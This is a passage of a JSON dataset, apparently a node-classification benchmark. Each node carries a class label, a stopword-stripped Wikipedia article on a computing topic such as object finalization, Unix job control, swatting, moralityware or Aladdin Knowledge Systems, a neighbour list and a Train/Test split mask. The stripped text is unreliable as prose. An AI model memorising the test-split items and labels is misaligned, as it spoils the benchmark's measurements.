resources instead generally managed manually via dispose pattern resources may still acquired initialization released calling codice_17 method nevertheless using finalization releasing resources languages common anti-pattern forgetting call codice_17 still cause resource leak cases techniques combined using explicit dispose method also releasing still-held resources finalization backup commonly found c implemented registering object finalization whenever resource acquired suppressing finalization whenever resource released user-specified finalizers allowed possible finalization cause object resurrection finalizers run arbitrary code may create references live objects objects destroyed languages without garbage collection severe bug causes dangling references memory safety violations languages garbage collection prevented garbage collector commonly adding another step garbage collection running user-specified finalizers check resurrection complicates slows garbage collection object resurrection means object may destroyed pathological cases object always resurrect finalization making indestructible prevent languages like java python python 3.4 finalize objects finalize resurrected objects concretely done tracking object finalized object-by-object basis objective-c also tracks finalization least recent apple versions similar reasons treating resurrection bug different approach used .net framework notably c visual basic .net finalization tracked queue rather object case user-specified finalizer provided default object finalized queued finalization creation dequeued finalized changed via calling codice_19 module finalization prevented calling codice_20 dequeues object reactivated calling codice_21 enqueues object particularly used using finalization resource management supplement dispose pattern implementing object pool finalization formally complementary initialization – initialization occurs start lifetime finalization end – differs significantly practice variables objects initialized primarily assign values general objects finalized general need clear values – memory simply deallocated reclaimed operating system beyond assigning initial values initialization primarily used acquire resources register object service like event handler actions symmetric release unregister actions symmetrically handled finalizer done raii however many languages notably garbage collection object lifetime asymmetric object creation happens deterministically explicit point code object destruction happens non-deterministically unspecified environment discretion garbage collector asymmetry means finalization effectively used complement initialization happen timely manner specified order specified environment symmetry partially restored also disposing object explicit point case disposal destruction happen point object may disposed still alive state weakens class invariants complicates use variables generally initialized start lifetime finalized end lifetime – though variable object value object may finalized cases variables also finalized gcc extensions allow finalization variables reflected naming finalization codice_22 construct fulfill similar purposes performing final action generally cleaning something else finished differ occur – codice_22 clause executed program execution leaves body associated codice_15 clause – occurs stack unwind thus stack pending codice_22 clauses order – finalization occurs object destroyed happens depending memory management method general simply set objects awaiting finalization – often heap – need happen specific order however cases coincide c++ object destruction deterministic behavior codice_22 clause produced local variable object value whose scope block corresponds body codice_15 clause – object finalized destructed execution exits scope exactly codice_22 clause reason c++ codice_22 construct – difference finalization defined class definition destructor method rather call site codice_22 clause conversely case codice_22 clause coroutine like python generator coroutine may never terminate – ever yielding – thus ordinary execution codice_22 clause never executed one interprets instances coroutine objects codice_22 clause considered finalizer object thus executed instance garbage collected python terminology definition coroutine generator function instance generator iterator thus codice_22 clause generator function becomes finalizer generator iterators instantiated function notion finalization separate step object destruction dates analogy earlier distinction initialization object construction literature prior point used destruction process distinguishing finalization deallocation programming languages dating period like c++ perl use term destruction terms finalize finalization also used influential book design patterns 1994 introduction java 1995 contained codice_1 methods popularized term associated garbage collection languages point generally make distinction use term finalization particularly context garbage collection",
    "neighbors": [
      2304,
      9482,
      5008,
      9490,
      11539,
      1435,
      541,
      3871,
      10783,
      1954,
      5165,
      814,
      5677,
      1715,
      3512,
      572,
      2625,
      1474,
      1736,
      4424,
      5961,
      716,
      6221,
      5840,
      5074,
      86,
      8545,
      10470,
      2152,
      3562,
      7403,
      8554,
      3573,
      3577,
      634,
      8573,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 4748,
    "label": 9,
    "text": "John_Bridges_(software_developer):john bridges software developer john bridges co-author computer program pcpaint primary developer program grasp microtex industries doug wolfgram also sole author glpro aftergrasp article entitled differential image compression published february 1991 issue dr. dobb journal 1980 bridges started programming career nyu institute reconstructive plastic surgery summer intern working sophisticated programmable vector graphics systems wrote editing tools also updated debugged software used early 3d x-ray scanning research 1981-85 bridges wrote ram disk drivers utilities cracking software task switching software memory test diagnostics abacus maker large memory cards apple ii 1982 started working classroom consortia media inc. educational software company developing writing apple ibm graphics libraries tools software tenure created drawing program called superdraw ccm wrote core graphics code would later become pcpaint well develop grasp gl library format 1984 bridges developed first version pcpaint doug wolfgram mouse systems pcpaint first ibm pc-based mouse driven gui paint program company purchased exclusive rights pcpaint john continued development 1990 1985 bridges pcpaint code doug slideshow program morphed new program grasp grasp first multimedia animation program ibm pc created grasp gl library format grasp originally released shareware doug company microtex industries however version 2.0 sold commercially paul mace software doug sold shares pcpaint grasp bridges 1990 bridges work grasp continued 1994 terminated contract paul mace software bridges work grasp included several toolsets add-ons pictor paint artools hrfe high res flic enhancement pc speaker sound code caused paul mace software threatened lawsuit realsound use frequency modulation upon realsound held patent stripped-down version grasp 4.0 also included copies philip shaddock multimedia creations hands-on workshop exploring animation sound 1987 bridges released vidspeed freeware program tests speed graphics cards measuring throughput writing constant pixel data video memory bus graphics modes vidspeed well received community recommended least two books patrick killelea web performance tuning stephen j. bigelow bigelow computer repair toolkit though bigelow expresses concern support updates 1986-87 bridges authored project ibm multimedia lab played back full color video 1/4 size window new ibm model 30 8 mhz 8086 cpu new mcga 320x200 256-color video mode play full color video early date dos history smoothly one slowest low-end ibm ps/2 models sold ibm applied patent algorithms developed though filed name project manager ibm algorithms later published article bridges entitled differential image compression first appeared dr. dobb journal february 1991 later reprinted magazine july 2001 along james h. sylvester 1993 article differential compression algorithms adapts bridges algorithms generalized data graphics ibm project came imagetools 1987 collection high color 15bit 24bit 32bit vga/ega image conversion scaling tools sold metacreations corp./harvard systems corp hsc software 1988 bridges authored freeware image viewer program called picem image viewers time commercial picem also allowed user adjust images brightness contrast save image viewed formats including bsave graphics image format picem became popular enough microsoft offered tech help using conjunction quickbasic also 1988 bridges released vgakit vgakit svga programming kit freeware vgakit open source library accessing extended graphics modes dos standardized vesa vbe arrived used several open closed source projects developer univbe program extended video cards bios become compatible new vesa vbe said bridges provided information without univbe would never gotten started whole pc graphics community deeply debt author michael abrash 1997 book graphics programming black book says little ddj dr. dobb journal columns published mode x although bridges widely distributed code number undocumented 256-color resolutions ’ like acknowledge influence code mode set routine presented chapter 47 codes abrash refers mode x 360x480 256-color mode codes bridges included vgakit worked vga svgas abrash ddj articles published circa 1991 compiled gpbb grasp 3.5 released included bridges newest version pcpaint pictor paint version 4.0 included bridges artools collection image manipulation tools included early morphing utility tracked points source destination images creating in-between frames 1995 bridges created glpro ims newest incarnation bridges ideas behind grasp updated windows 2000 glpro became property gmedia plc closed 2001 bridges stopped glpro work time stripped version glpro included conrad r. brandt book glpro foundations 2000 2002 bridges started work new program aftergrasp designed backwards compatible glpro work still continuing project pictor pic image format image file format developed bridges pcpaint also native file format grasp glpro first widely accepted dos imaging standard",
    "neighbors": [
      3323,
      6797,
      9166
    ],
    "mask": "None"
  },
  {
    "node_id": 4749,
    "label": 4,
    "text": "Christine_O'Keefe:christine o'keefe christine margaret o'keefe australian mathematician computer scientist whose research included work finite geometry information security data privacy researcher csiro lead author 2017 report office australian information commissioner best practices de-identification personally identifying data o'keefe bachelor degree university adelaide initially intending study medicine earning first-class honours mathematics 1982 returned adelaide doctoral study 1985 completed ph.d. 1988 dissertation concerning formula_1-spreads formula_2 supervised rey casse lecturer research fellow university western australia 1999 2001 returned university adelaide adelaide worked lecturer senior lecturer queen elizabeth ii fellow senior research fellow research interests shifted finite geometry information security effect shift moved 2000 adelaide csiro csiro founded information security privacy group 2002 became head health informatics group 2004 became theme leader health data information 2006 strategic operations director preventative health national research 2008 studied mba australian national university finishing 2008 became director population health research network centre professor health sciences curtin university 2009 2010 returning csiro science leader privacy confidentiality csiro department mathematics informatics statistics o'keefe fellow institute combinatorics applications since 1991 1996 o'keefe hall medal institute combinatorics applications work finite geometry australian mathematical society medal 2000 first woman win medal year became fellow australian mathematical society although medal citation primarily discussed o'keefe work finite geometry discovery new hyperovals included paragraph research using geometry secret sharing precursor later work information security",
    "neighbors": [
      4232,
      5373,
      1783
    ],
    "mask": "None"
  },
  {
    "node_id": 4750,
    "label": 2,
    "text": "Job_control_(Unix):job control unix unix unix-like operating systems job control refers control jobs shell especially interactively job shell representation process group basic job control features suspending resuming terminating processes job/process group advanced features performed sending signals job job control particular interest unix due multiprocessing distinguished job control generally frequently applied sequential execution batch processing using unix unix-like operating systems via terminal terminal emulator user initially single process running login shell tasks directory listing editing files etc easily accomplished letting program take control terminal returning control shell program exits – formally attaching standard input standard output shell reads writes terminal catching signals sent keyboard like termination signal resulting pressing however sometimes user wish carry task using terminal another purpose task running receiving input terminal said running background single task receiving input terminal foreground job control facility developed make possible allowing user start processes background send already running processes background bring background processes foreground suspend terminate processes concept job maps shell concept single shell command operating system concept possibly many processes command entails multi-process tasks come processes may create additional child processes single shell command may consist pipeline multiple communicating processes example command select lines containing text title sort alphabetically display result pager creates least three processes one one one job control allows shell control related processes one entity user issues appropriate key combination usually entire group processes gets suspended jobs managed operating system single process group job shell internal representation group defined posix job referred handle called job control job id simply used shell builtins refer job job ids begin codice_1 character codice_2 identifies job n codice_3 identifies current job job ids specified posix informal usage number may referred job number job id bash documentation refers -prefixed job id jobspec job control job ids typically used interactive use simplify referring process groups scripting pgids used instead precise robust indeed job control disabled default bash scripts job control first implemented c shell jim kulp iiasa austria making use features 4.1bsd kernel korn shell developed bell labs adopted later incorporated svr4 version bourne shell exists modern unix shells posix standard specifies two commands resuming suspended jobs background foreground respectively modeled korn shell job control commands typically shell keeps list jobs job table recall job corresponds process group consists members pipeline descendants codice_4 command list background jobs existing job table along job number job state stopped running session ends user logs exits shell terminates session leader process shell process sends sighup jobs waits process groups end terminating codice_5 command used remove jobs job table session ends child process groups sent sighup shell wait terminate thus become orphan processes may terminated operating system though often used processes adopted init kernel sets parent process init continue executing daemons alternatives prevent jobs terminated include nohup using terminal multiplexer job running foreground stopped typing suspend character ctrl-z sends terminal stop signal sigtstp process group default sigtstp causes processes receiving stop control returned shell however process register signal handler ignore sigtstp process also paused stop signal sigstop caught ignored job running foreground interrupted typing interruption character ctrl-c sends interrupt signal sigint defaults terminating process though overridden stopped job resumed background job codice_6 builtin foreground job codice_7 either case shell redirects i/o appropriately sends sigcont signal process causes operating system resume execution bash program started background job appending ampersand codice_8 command line output directed terminal potentially interleaved programs output read terminal input background process attempts read write controlling terminal sent sigttin input sigttou output signal signals stop process default may also handled ways shells often override default stop action sigttou background processes deliver output controlling terminal default bash-compatible shells codice_9 builtin codice_10 signal jobs job id well process group id – sending signal job sends whole process group jobs specified job id killed prefixing codice_1 kill send signal job however intent rid system processes signals sigkill sigterm default probably applicable",
    "neighbors": [
      515,
      9733,
      9735,
      5256,
      521,
      6281,
      6664,
      8975,
      11663,
      4369,
      7188,
      5397,
      2198,
      6812,
      7196,
      671,
      4001,
      6138,
      1316,
      2599,
      7847,
      8236,
      4398,
      7983,
      11442,
      8499,
      4277,
      1336,
      8504,
      5435,
      7356,
      451,
      1987,
      965,
      2245,
      3526,
      8517,
      9542,
      5706,
      3659,
      8395,
      1741,
      8522,
      10967,
      9946,
      93,
      8414,
      8675,
      10727,
      6120,
      8041,
      491,
      8954,
      9452,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      9204,
      10484,
      8697,
      506,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 4751,
    "label": 9,
    "text": "Refined_Printing_Command_Stream:refined printing command stream refined printing command stream also known rpcs vector-based printing/duplicating control protocol designed communication microsoft windows pc clients several lines ricoh copiers drivers provided ricoh install chosen copier behave printer device size-efficiency protocol comparable pcl6 ricoh offers rpcs based drivers windows mac os extent linux drivers linux provided japanese website instead aficio called ipsio",
    "neighbors": [
      10784,
      5384,
      6830,
      5617,
      8763
    ],
    "mask": "None"
  },
  {
    "node_id": 4752,
    "label": 4,
    "text": "Copyright_alternatives:copyright alternatives various copyright alternatives alternative compensation systems acs proposed ways allow widespread reproduction digital copyrighted works still paying authors copyright owners works article discusses proposals involve form government intervention models street performer protocol voluntary collective licenses could arguably called alternative compensation systems although different generally less effective solving free rider problem impetus proposals come widespread use peer-to-peer file sharing networks authors argue acs simply practical response situation acs advocates go holding p2p file sharing fact greatly beneficial tax levy funded systems actually desirable tools paying artists sales coupled drm copy prevention technologies artistic freedom voucher afv proposal argues current copyright system providing state enforced monopoly leads enormous inefficiencies creates substantial enforcement problems afv proposed system individuals would allowed contribute refundable tax credit approximately 100 creative worker contribution would act voucher used support artistic creative work recipients afv contribution would turn required register government similar fashion religious charitable institutions tax-exempt status sole purpose registration would prevent fraud would evaluation quality work produced alongside registration artists would also ineligible copyright protection set period time 5 years example work contributed public domain allowed freely reproduced afv would affect creative workers ability receive funds via live performances proponents claim system could create 20 billion annually pay artists far greater currently flows copyrighted material 100 per adult voucher 500,000 writers musicians singers actors creative workers could paid 40,000 year baker also states realistic assume savings reduced expenditures copyrighted work would vastly exceed cost afv majority savings would come individuals deciding use afv supported work place copyrighted work well lower advertising costs afv material would public domain copyright enforcement demand would also decrease afv material increased assumptions made low end direct costs public copyrighted material would reduced around 20 percent high end way 60 percent time also likely savings would increase due lesser costs system brighter prospects 2010 article critical afv proposal graphic designer mark stanley writes like school vouchers flat tax pretenders afv assumes necessity state intervention tries bend liberty around strictures freedom ’ forgiving manipulation systematic restructuring copyright laws proposed afv far put practice concept paying artists donations tested success 2006 musician jeff rosenstock founded quote unquote records advertised first donation-based record label artists label make music available download free invite listeners make small donation want donations ticket sales live shows quote unquote records successfully recording music expanding number bands label past twelve years proposals included targeted levies internet connections blank cds digital media players etc many goods levied various countries existing private copying schemes income taxation optional payments users terms economic theory consumer opt regimes different universal ones depending scheme administered differences might large example default option isp subscribers pay acs surcharge could avoided filing signed commitment make unauthorised downloads p2p networks effects might quite similar scheme however unsuitable business owners maintain free internet connections incentive customers would responsibility business owner monitor customer internet use various proposals made base distribution royalties measures consumer downloading usage voting computer security issues addressed collecting data considerable privacy verifiability obstacles similar encountered internet voting may soluble hardware assistance currently available ordinary pcs practical way deploy acs short term would collect statistical samples much smaller population actual distribution royalties would likely carried copyright collecting society alternative compensation systems two significant advantages digital copyright impose artificial scarcity copyright works everyone download many songs ebooks films want economic terns acs eliminate deadweight loss copyright monopolies also avoid high technological social costs digital copyright enforcement two greatest drawbacks acses excess burden taxation collected need decide tax/levy rates use system although methods contingent valuation may help little question canada private copying levy unforeseen result temporarily creating acs kinds p2p downloading bmg v. doe dictum suggested also apply uploading dictum criticised appeal france december 2005 dadvsi amendments passed senate would created acs called global license amendments removed bill finally became law 2009 german social democratic party added proposal acs variant called cultural flat-rate party platform",
    "neighbors": [
      2864,
      11659,
      743
    ],
    "mask": "Train"
  },
  {
    "node_id": 4753,
    "label": 4,
    "text": "Swatting:swatting swatting criminal harassment tactic deceiving emergency service via means hoaxing emergency services dispatcher sending police emergency service response team another person address triggered false reporting serious law enforcement emergency bomb threat murder hostage situation alleged incident also triggered false report mental health emergency reporting person allegedly suicidal homicidal may may armed united states maximum prison sentence handed court march 2019 swatter 20 years jail fatal 2017 swatting violation term derives law enforcement unit swat special weapons tactics specialized type police unit many countries carrying military-style equipment door breaching weapons submachine guns automatic rifles sniper rifles threat may result evacuations schools businesses advocates called swatting described terrorism due use intimidate create risk injury death making false reports emergency services criminal offense many countries punishable fines imprisonment causes tax dollars wasted city county responding false report serious law enforcement emergency california swatters bear full cost response lead fines 10,000 bomb threats concern police 1970s public buildings airports evacuated response hoax calls designed cause mass panic public disruption delay exams educational institutions recent decades hoax callers sometimes make use techniques disguise identity country origin swatting origins prank calls emergency services years callers used increasingly sophisticated techniques direct response units particular types particular attempts swat teams dispatched particular locations spawned term swatting term used fbi early 2008 also entered oxford dictionaries online 2015 caller id spoofing social engineering tty prank calls phone phreaking techniques may variously combined swatting perpetrators 911 systems including computer telephony systems human operators tricked calls placed cities hundreds miles away location purported call even countries caller typically places 911 call using spoofed phone number hide fraudulent caller real location goal tricking emergency authorities responding swat team fabricated emergency swatting linked action doxing obtaining broadcasting often via internet address details individual intent harass endanger united states swatting prosecuted federal criminal statutes 2011 california state senator ted lieu authored bill increase penalties swatting family became victim swatting bill proposed dozen police officers along firefighters paramedics surrounded family home 2015 new jersey state assemblyman paul d. moriarty announced bill increase sentences hoax emergency calls targeted hoax bill proposed prison sentences ten years fines 150,000 2015 bipartisan bill congress sponsored katherine clark patrick meehan made swatting federal crime increased penalties congresswoman clark wrote op-ed hill saying 2.5 million cases cyber stalking 2010 2013 resulted 10 cases prosecuted although source provided revenge bill anonymous caller fraudulently called police rep. clark house january 31 2016 brazil swatting prosecuted criminal code following articles january 15 2015 sentinel oklahoma washita county dispatchers received 911 calls someone identified dallas horton told dispatchers placed bomb local preschool washita county sheriff deputies sentinel police chief louis ross made forced entry horton residence ross wearing bulletproof vest shot several times horton investigation revealed calls originate home led oklahoma state bureau investigation agents believe horton unaware law enforcement officers making entry james edward holly confessed investigators made calls two nonfunctioning phones angry horton ross shot multiple times chest arm injured treated injuries released local hospital december 28 2017 wichita police officer shot man named andrew finch kansas home swatting incident andrew finch later died hospital based series screenshotted twitter posts wichita eagle suggests finch unintended victim swatting two players team got heated argument 1.50 usd bet december 29 2017 lapd arrested 25-year-old serial-swatter tyler raj barriss known online swautistic xbox live goredtutor36 connection incident 2018 barriss indicted federal grand jury along two others involved incident according u.s. attorney stephen mcallister false hoax charge carries maximum punishment life federal prison charges carry sentences 20 years march 29 2019 barriss sentenced 20 years imprisonment 2009 blind phreaker matthew weigman caught help verizon fraud-investigator named billy smith weigman sentenced 11 years federal prison pleaded guilty charges including involvement swatting conspiracy attempting retaliate witness 2012 cnn interviewed political commentator erick erickson discuss incident victim swatting caller 911 gave erickson address claimed incident prompted florida 24th congressional district representative sandy adams push justice department investigation 2013 number u.s. celebrities became victims swatting including sean combs past swatting incidents homes ashton kutcher tom cruise chris brown miley cyrus iggy azalea jason derulo snoop dogg justin bieber clint eastwood 2013 network fraudsters involved carding doxing public officials using stolen credit reports targeted computer security expert brian krebs malicious police reports mir islam leader group also used swatting hoaxes prosecutor stephen p. heymann congressman mike rogers girl cyberstalking turned romantic proposals islam convicted doxing swatting 50 public figures including michelle obama robert mueller john brennan well krebs sentenced two years prison ukrainian computer hacker sergey vovnenko convicted trafficking stolen credit cards well planning purchase heroin ship brian krebs swatting sentenced 15 months prison italy 41 months prison new jersey may 2014 curtis gervais ottawa ontario arrested made thirty fraudulent emergency calls across north america leading sixty charges including uttering death threats conveying false information intent alarm public mischief mischief property gervais sentenced nine months home detention ontario court justice mitch hoffman noted hoax calls resulted evacuations schools homes shopping center caused thousands people lives put turmoil terrorized also called massive waste public resources significant cost emergency services therefore taxpayer august 27 2014 youtube user jordan mathewson known online kootra live streamed game twitch viewer called 911 claiming shooting building hostages swat team raided office mathewson gaming company creatures llc operating mathewson thrown ground searched officers searched room events broadcast live internet law enforcement blocked camera lens mathewson desk videos swatting went viral gaining four million views youtube reported news programs world september 11 2014 bukkit programmer wesley wolvereness wolfe victim swatting incident unidentified skype caller told police wolfe shot parents killing spree wolfe believed targeted retaliation issuing dmca takedown craftbukkit bukkit repository november 6 2014 home unnamed executive bungie developer halo destiny franchises raided local police call purported someone inside house said hostage situation residence caller demanded ransom 20,000 claimed planted explosives yard 45 minutes police determined call originated computer residence stated perpetrator hoax could face fine one year jail apprehended december 5 2014 police coquitlam british columbia arrested teenager using pseudonym 'obnoxious committed least 40 attempted successful acts swatting several countries teenager historically targeted mostly young female gamers ignored friend requests league legends twitter used social engineering techniques skype tracking tools obtain address details victims companies including cox communications voip calling mask real location went far live stream swatting calls youth pleaded guilty 23 crimes new york times article case criticized twitch failing block user associates site january 3 2015 twenty portland oregon police officers sent former home grace lynn transgender woman stated culmination months online harassment gamergate supporters withdrew support movement swatter coming serbia claimed affiliated gamergate lynn said alerted incident proactively checked online harassment daily defused situation contacting police may 2015 zachary lee morgenstern 19 cypress texas arrested made number hoax bomb threats swatting calls minnesota ohio massachusetts including two schools marshall minnesota police obtained ip address twitter google morgenstern pleaded guilty several federal crimes december 2015 sentenced 41 months prison august 2015 founder website mumsnet target swatting resulted deployment london metropolitan police service armed response unit attending home address hoax concurrent denial-of-service attack mumsnet website threats swatting attack january 31 2016 around 10pm u.s. representative katherine clark swatted anonymous caller claimed active shooter home melrose police responded home left determining call hoax rep. clark sponsored bill called 'interstate swatting hoax act 2015 aimed increasing penalties swatting well making swatting federal crime incident said sympathetic people victims swatting sunday night fully understands like stated swatting really cause double april 28 2017 twitch user paul denino pseudonym ice poseidon live streaming boarding american airlines flight plane landed law enforcement showed airport apron removed denino one person plane anonymous caller claimed denino bomb october 16 2017 bitcoin engineer jameson lopp neighborhood locked law enforcement responding reported hostage situation anonymous caller claimed shot killed one person holding others hostage ransom house rigged c4 lopp later wrote first person account ordeal offered bounty information leading arrest conviction perpetrator may 16 2018 popular streamer former professional overwatch player felix xqc lengyel home raided police handcuffed mid-stream california apartment lengyel later revealed three guns pointed overwatch league analyst brennon hook stated raid due noise complaint neighbor lengyel asserted act swatting june 5 2018 police called parkland florida home stoneman douglas high school shooting survivor gun-control activist david hogg caller claimed hostage situation prompting emergency response included swat team hogg home time washington d.c. family receive robert f. kennedy human rights award one organizers march lives winning 3 million top prize fortnite world cup july 2019 16-year-old kyle bugha giersdorf swatted august 2019 stream local swat team armed arrival however situation diffused one officers recognized giersdorf championship recognized call prank october 2018 seattle police department spd launched opt-in registry aimed people fear might become victims swatting celebrities live streamers using registry people provide cautionary information spd inform officers responding potential swatting attempts targeted victim address security reporter brian krebs recommends police departments take extra care responding calls received non-emergency numbers text-to-speech services tty since methods often employed out-of-area swatters connect regional 911 center",
    "neighbors": [
      8805,
      2409,
      9550,
      82,
      8950,
      2558,
      9055
    ],
    "mask": "None"
  },
  {
    "node_id": 4754,
    "label": 7,
    "text": "LeanIX:leanix leanix name stands lean information exchange software vendor provides tools services areas enterprise architecture application portfolio management small medium large enterprises company headquarters bonn subsidiary us office boston leanix mentioned gartner magic quadrant enterprise architecture tools 2015 leanix founded jörg beyer andré christ 2012 prior founding leanix jörg beyer andré christ worked various management positions i.e cio deutsche post first 3 years company bootstrapped grew without external funding thanks first product leanix first released october 2012 february 2015 capnamic ventures iris capital invested usd 2.5 mio eur 2.2 mio series financing round 2018 jörg g. beyer retired managing director andré christ stays sole ceo leanix raised 30 million december 2018 round led insight venture partners since founding company focusses exclusively providing software product leanix used customers web-based information platform store information applications architecture company company reports leanix employed media insurance logistics energy manufacturing e-commerce enterprises anywhere 100 100,000 employees customers include axel springer se haworth inc. helvetia insurance kühne nagel ruag rwe zalando one major use case market leading publishing company germany axel springer describes usage leanix part digital transformation organization building bi-modal architecture support traditional fast another use case zalando uses leanix central platform enterprise architecture environment information many microservices gathered automatically injected leanix platform using open rest api product available software service cloud september 2015 company received data privacy certificate leanix global network partners order provide specialised support areas integrations consulting company partnership program place train partners give access knowledge resources certified partners include example enzyme consulting based spain berlin based company signavio among one first out-of-the box integrations product business process management besides integrations tools like jira confluence leanix partnership onelogin single-sign via saml customers build integrations using open source sdks java php python c leanix mentioned gartner magic quadrant enterprise architecture tools 2015 out-of-the-box affordable cloud-based ea tool especially suitable midsize smaller organizations companies different industries written testimonials leanix gartner peer insights mentioning leanix great portfolio management tool apm features 2015 leanix awarded 2nd place innovation award digital transformation",
    "neighbors": [
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 4755,
    "label": 4,
    "text": "Vulnerability_management:vulnerability management vulnerability management cyclical practice identifying classifying prioritizing remediating mitigating software vulnerabilities vulnerability management integral computer security network security must confused vulnerability assessment vulnerabilities discovered vulnerability scanner analyzes computer system search known vulnerabilities open ports insecure software configurations susceptibility malware infections may also identified consulting public sources nvd subscribing commercial vulnerability alerting service symantec deepsight vulnerability datafeed accenture vulnerability intelligence service unknown vulnerabilities zero-day may found fuzz testing identify certain kinds vulnerabilities buffer overflow relevant test cases analysis facilitated test automation addition antivirus software capable heuristic analysis may discover undocumented malware finds software behaving suspiciously attempting overwrite system file correcting vulnerabilities may variously involve installation patch change network security policy reconfiguration software educating users social engineering",
    "neighbors": [
      3969,
      5636,
      10385,
      4117,
      3094,
      5404,
      8094,
      2084,
      2213,
      939,
      11567,
      7601,
      1474,
      5327,
      1232,
      4689,
      4435,
      4309,
      2262,
      1369,
      7515,
      3552,
      612,
      3944,
      1907,
      4471,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4756,
    "label": 4,
    "text": "Moralityware:moralityware moralityware subset malware infects pc intention imposing morality upon user example blocking pornographic websites first cited example appeared eweek example cited trojan deemed yusufali-a sophos said monitor internet explorer title bars content potentially relating pornography upon triggering internet explorer window minimized window take place quote koran translated several languages time trojan display exit button trap mouse cursor within window button attempted clicked displaying message oh 'm cage trojan require computer logged minimum return control mouse remains unclear whether trojan designed joke truly moral guardian regardless anti-virus makers blocking software virus definitions additionally remains seen whether indicates trend malware simply new term one-time occurrence",
    "neighbors": [
      7515,
      10756,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 4757,
    "label": 4,
    "text": "Poor_man's_copyright:poor man copyright poor man copyright method using registered dating postal service notary public highly trusted source date intellectual property thereby helping establish material one possession since particular time concept based notion event intellectual property misused third party poor-man copyright would least establish legally recognized date possession proof third party may possess countries central copyright registration authority difficult author prove work created united kingdom patent office says ... copy could deposited bank solicitor alternatively creator could send copy special delivery post gives clear date stamp envelope leaving envelope unopened return number private companies operate unofficial registers would sensible check carefully paying choosing route important note prove work original created ... provision us copyright law regarding type protection poor man copyright therefore substitute registration according section 101 u.s copyright act 1976 17 u.s.c 408 registration work copyright office prerequisite copyright protection furthermore eric goldman noted absence cases actually giving value poor man copyright",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4758,
    "label": 3,
    "text": "La_Abadía_del_Crimen:la abadía del crimen la abadía del crimen abbey crime computer video game programmed 1987 paco menéndez graphics made juan delcán game originally conceived version umberto eco book name rose however paco menéndez opera soft received reply eco order secure rights name game released la abadía del crimen abbey crime fact original working title novel name rose game videoadventure 3d isometric graphics franciscan friar william occam william baskerville book young novice adso discover perpetrator series murders medieval italian abbey player controls movement friar fra william mistakenly described monk user manual player also possibility control movement novice adso within screen fra william key controlling novice pressed follows fra william time game features characters representing monks abbey behave according programmed artificial intelligence move throughout mapping abbey show series dialogs shown written text moved along lower part screen extensive mapping abbey represented large series screens 3d isometric graphics series objects collected order successfully complete game action occurs seven days subdivided different canonical hours time day current hour indicated bottom left screen game starts abbot welcoming fra william explaining monk disappeared also explains fra william obligated obey orders abbot rules monastery attend religious services meals stay cell night research crimes pursued game novice adso remind players attend offices meals players follow forget way church refectory players disobey orders late services etc. obsequium level indicated bottom right-hand-side screen drop obsequium latin subservience obedience obsequium level drops zero abbot tolerate disrespect longer players leave abbey would result game actions missing prayer office altogether caught wandering around night result immediate expulsion end game game originally developed amstrad cpc 6128 8 bit platform ported systems zx spectrum msx pc amstrad cpc 464 version different 6128 original since several rooms decoration removed fit game 64k 464 spectrum version 128 platform music played game corresponds minuet g major sonata flute bwv 1033 bach crystal palace gwendal original pc version also featured ave maria schubert short chorus recording played speaker player went church form copy protection pc version illegal copy game created church area instead ave maria voice crying pirata pirata pirata several times heard instead game crash game programmed making capacities 8-bit computers taking high level care details plot mapping graphics artificial intelligence characters sound etc made game regarded one best video games made 8-bit computers spite singular qualities expressed positive initial reviews game modest commercial success never officially released outside spain country came achieve cult following game also considered one perfect ten games spectrum 128 according retro gamer",
    "neighbors": [
      10284,
      6797,
      9006,
      10480,
      6129,
      499,
      10931,
      8700,
      4758,
      823,
      5820
    ],
    "mask": "Test"
  },
  {
    "node_id": 4759,
    "label": 3,
    "text": "Beamrider:beamrider beamrider fixed shooter designed intellivision david rolfe published activision 1983 game ported atari 2600 slightly reduced feature set atari 5200 atari 8-bit family colecovision commodore 64 zx spectrum msx platforms beamrider takes place earth atmosphere large alien shield called restrictor shield surrounds earth player objective clear shield 99 sectors alien craft piloting beamrider ship beamrider equipped short-range laser lariat limited supply torpedoes player given three start sector clear sector fifteen enemy ships must destroyed sentinel ship appear destroyed using torpedo remain bonus points enemy ships destroyed torpedoes must simply dodged occasionally sector yellow rejuvenators extra lives appear picked extra ship shot transform ship-damaging debris activision offered special beamrider patches players could get sector 14 40,000 points sent screenshot accomplishment deseret news 1984 gave colecovision version beamrider three stars describing basically slide-and-shoot space game reviewer commodore described commodore 64 version game really good wholesome arcade zapping game",
    "neighbors": [
      4361,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4760,
    "label": 4,
    "text": "Aladdin_Knowledge_Systems:aladdin knowledge systems aladdin knowledge systems formerly company produced software digital rights management internet security company acquired safenet inc 2009 corporate headquarters located belcamp md aladdin knowledge systems founded 1985 jacob yanki margalit 23 years old soon joined brother dany margalit took responsibility product development age 18 time completing mathematics computer science degree tel aviv university early years company developed two product lines artificial intelligence package dropped early hardware product prevent unauthorized software copying similar digital rights management yanki raised 10,000 initial capital company digital rights management product became success 1993 generated sales 4,000,000 year company initial public offering nasdaq raising 7,900,000 2004 company shares also listed tel aviv stock exchange 2007 company annual revenues reached 105 million mid-2008 vector capital attempting purchase aladdin vector initially offered 14.50 per share aladdin founder margalit refused offer arguing company worth aladdin shareholders agreed merger february 2009 11.50 per share cash march 2009 vector capital acquired aladdin officially merged safenet aladdin hasp product line digital rights management drm suite protection licensing software 40 global market share used 30,000 software publishers used across many platforms windows linux mac hasp stands hardware software piracy company first product evolved complete digital rights management suite includes software option back office management application recent years also software service capability late 1990s company started diversifying began offering internet security network security products offering two product lines etoken portable device two-factor authentication pasdigital identity management mainly deployed usb token esafe line integrated network security content filtering products protecting networks cracked pirated internet-borne software used adobe macromedia 30-days product trials",
    "neighbors": [
      3521,
      3941,
      1994,
      939,
      8330,
      11248,
      6993,
      9745,
      467,
      10801,
      9817,
      7327
    ],
    "mask": "Test"
  },
  {
    "node_id": 4761,
    "label": 7,
